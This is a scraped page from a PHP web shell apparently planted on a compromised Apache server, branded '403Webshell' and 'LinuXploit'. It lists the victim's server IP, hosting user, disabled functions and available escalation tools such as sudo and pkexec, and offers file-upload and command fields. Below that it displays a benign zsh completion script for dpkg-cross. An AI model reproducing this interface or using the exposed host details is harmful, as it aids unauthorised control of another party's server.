403Webshell
Server IP : 51.89.169.208  /  Your IP : 216.73.216.126
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/zsh/5.5.1/functions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/zsh/5.5.1/functions/_dpkg-cross
#compdef dpkg-cross

local _dpkgcross_arches

_dpkgcross_arches=(/etc/dpkg-cross/cross-config.*(N))
_dpkgcross_arches=(${${_dpkgcross_arches#*.}:-alpha amd64 common cygwin-i386 gnu hppa i386 linux m32r m68k mips powerpc sh sh3 sh3eb sh4 sh4eb w32})

_arguments \
  '(-h --help)'{-h,--help}'[show summary of options]' \
  '(-v --verbose)'{-v,--verbose}'[be more verbose]' \
  '(-q --quiet)'{-q,--quiet}'[be more quiet]' \
  '(-a --arch)'{-a,--arch}':architecture:('"$_dpkgcross_arches"')' \
  '(-i --install)'{-i,--install}'[install packages]' \
  '(-A --convert-anyway)'{-A,--convert-anyway}'[convert package even if not useful]' \
  '(-b --build)'{-b,--build}'[just build but do not install]' \
  '(-r --remove)'{-r,--remove}'[remove packages]' \
  '(-s --status)'{-s,--status}'[print status of named packages]' \
  '(-l --list)'{-l,--list}'[print short status of named packages or patterns]' \
  '(-L --list-files)'{-L,--list-files}'[list files belonging to named packages]' \
  '(-u --update)'{-u,--update}'[update current cross-inst]' \
  '(-Q --query)'{-Q,--query}'[print available update packages]' \
  '*:package or path or pattern:_files'

Youez - 2016 - github.com/yon3zu
LinuXploit